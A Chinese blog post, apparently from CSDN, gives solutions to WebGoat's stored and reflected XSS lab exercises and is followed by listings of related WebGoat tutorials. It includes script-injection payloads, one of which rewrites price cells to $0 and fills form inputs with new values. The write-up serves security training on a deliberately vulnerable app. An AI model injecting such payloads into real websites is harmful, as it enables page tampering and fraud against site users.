WebGoat——XSS Attacks(part 2)

最新推荐文章于 2024-05-31 15:59:54 发布
最新推荐文章于 2024-05-31 15:59:54 发布
阅读量1.5k 收藏
点赞数
分类专栏: 网络安全 Webgoat 文章标签: input 脚本 fun 存储
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu422560654/article/details/7787371
版权

1、存储型

脚本:><script>alert('just for fun')</script>


------------------------------------------------------------------------------------------------------------------------------------------------------------

2、反射型


题意:通过反射型XSS,修改页面数据来达到攻击的目的。

大哭有点难度,参考答案做的。。。)

代码如下

'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
	if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
	{
		document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0-->
	}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
	if(document.getElementsByTagName("input")[i].type=='text')
	{
		document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000-->
	}
};
</script>

效果:



第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。


------------------------------------------------------------------------------------------------------------------------------------------------------------





00M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全—XSS攻击(二)
Lemon's blog
04-28 527
练习了DVWA靶场中的XSS了解了一些原理和攻击方式,接下来就用在线XSS平台开始实战一番。 在线XSS平台地址 第一关肯定不会太难,就用最常用的攻击语句试试。 <script>alert(/hacker/)</script> 第二关 就先把这个最简单的攻击语句放上去看看 <script>alert(/hacker/)</script> 没...
webgoat——Session Management Flaws会话管理缺陷
01-20
Session Management Flaws 会话管理: ...在用户登录认证成功之后,服务器生成sessionid通过cookie返回给用户所在的浏览器从而使每个用户都会有一个唯一标识sessionID(详细问度娘诺) 然后还在网上找了一个会话管理的...
【详解】webgoat Web渗透测试平台Injection单元 攻略
M0nH1N的博客
08-15 2525
一、什么是webgoatWebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。WebGoat提供了一系列web安全学习的教程,某些课程也给出了
Webgoat学习笔记
swordheart的博客
04-26 2771
0x00 安装 WebGoat的版本区别 WebGoat是一个渗透破解的习题教程,分为简单版和开发版,GitHub地址. 简单版安装 简单版是个JAVA的Jar包,只需要有Java环境,然后在命令行里执行 1 2 3 <code>#!bash java -jar webgoat-container-7.0.1-war-exec.jar </code> 然后就可以访问"127.0.0.1
WEB攻防-JAVAWEB项目常见漏洞
最新发布
weixin_45534587的博客
05-31 808
1.JavaWeb常见安全及代码逻辑2.目录遍历&身份验证&逻辑&JWT3.访问控制&安全组件&越权&三方组件本篇主要了解以上问题在javaweb中的呈现,第一个重点理解URL与javaweb代码框架的对应方式,java在没有代码的情况下是很难渗透的,下面的内容也是针对白盒的第二个重点是JWT身份验证/攻击。
webgoat全关教程手册
热门推荐
黑白的博客
11-08 5万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、WebgoatWebwolf WebgoatWebwolf jdk1.8不支持了,需要安装jdk11 去git上下载WebgoatWebwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
【2022】WebGoat的安装与测试
既来之,则留之
03-17 7628
WebGoat环境搭建
WebGoat通关攻略
weixin_45539802的博客
01-06 2万+
WebGoat通关攻略 目录WebGoat通关攻略前言一、环境配置1.Docker配置2.WebGoat获取3.WebGoat连接二、通关攻略(建设中)1.Introduction2.General3.Injection4.Broken Authentication5.Sensitive Data Exposure6.XML External Entities(XXE)7.Broken Access Control8.Cross-Site Scripting(XSS)9.Insecure Deseriali
WebGoat-5.4.part2
07-07
WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,
webgoat5.4 part2
02-25
WebGoat-5.4-OWASP_Standard_Win32.part2 同前都下载解压即可使用。
webgoat 5.3 rc1 part2
04-19
WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons
WebGoat-5.4.part1
07-07
WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境
如何搭建 WebGoat 靶场保姆级教程(附链接)
Flag少侠的博客
01-30 4246
如何搭建 WebGoat 靶场保姆级教程
6.4 Web安全漏洞学习平台:WebGoat的使用
qq_55202378的博客
08-14 3378
webgoat JDK
Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)
网络安全领域___专研者.
06-16 2453
WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。 Vulapp收集各种漏洞环境,为方便使用,统一采用 Dockerfile 形式,同时也收集了安全工具环境.
WebGoat通关攻略与详细解析——SQL Injection(intro)篇
qq_43739482的博客
10-18 4284
WebGoat靶机通关攻略,详细描述了题目的要求、解题思路和过程、通关答案。
WebGoat5.4 Cross-Site Scripting (XSS) 开发版本关卡 通关攻略
weixin_46356548的博客
12-27 3450
本人在学习WebGoat5.4时,发现有些题目需要在开发版本上完成,网上能找到的所谓的通关教程,都说这些题目做不了,经过尝试发现,其实是可以完成的,本篇将对这部分进行重点说明。
webgoat
frutrue的博客
07-12 397
webgoat挑战
WebGoat通关详解
chengede98的博客
03-22 1109
通过完成WebGoat的通关过程,用户可以全面提升自己在Web安全领域的知识和技能水平。因此,我们鼓励更多的用户参与到WebGoat的学习中来,共同为构建一个更安全的Web环境贡献力量。这有助于用户了解自己的学习进度和需要改进的地方。因此,用户需要保持学习和实践的态度,不断更新自己的知识和技能。除了完成WebGoat的练习外,用户还可以关注最新的安全动态和技术趋势,参与相关的安全活动和项目实践。参考文档和社区资源:如果遇到难以解决的问题或需要进一步的帮助,用户可以参考WebGoat提供的文档和社区资源。
基于WebGoat平台的XSS攻击实验
05-23
2. 启动WebGoat:启动WebGoat后,您将看到一个Web界面,其中包含许多练习。选择“Cross-Site Scripting(XSS)”练习。 3. 阅读练习说明:WebGoat将提供有关练习的说明和操作步骤。在XSS练习中,您将学习如何使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值